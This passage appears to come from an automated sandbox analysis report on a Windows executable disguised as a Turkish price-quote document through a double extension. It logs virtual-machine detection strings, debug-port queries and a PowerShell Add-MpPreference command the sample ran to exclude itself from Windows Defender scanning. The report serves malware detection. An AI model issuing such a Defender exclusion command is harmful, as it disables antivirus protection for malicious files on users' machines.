                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -594749s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -594640s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598030Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597371Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596936Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596827Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596276Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596171Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595843Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595624Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595515Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594749Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594640Jump to behavior
                  Source: Amcache.hve.8.drBinary or memory string: VMware
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.0000000003758000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: gMMLfb6ibedfHvMciwL
                  Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708842745.0000000001067000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla"Y
                  Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                  Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002FC5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002F9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002FC5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002F9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
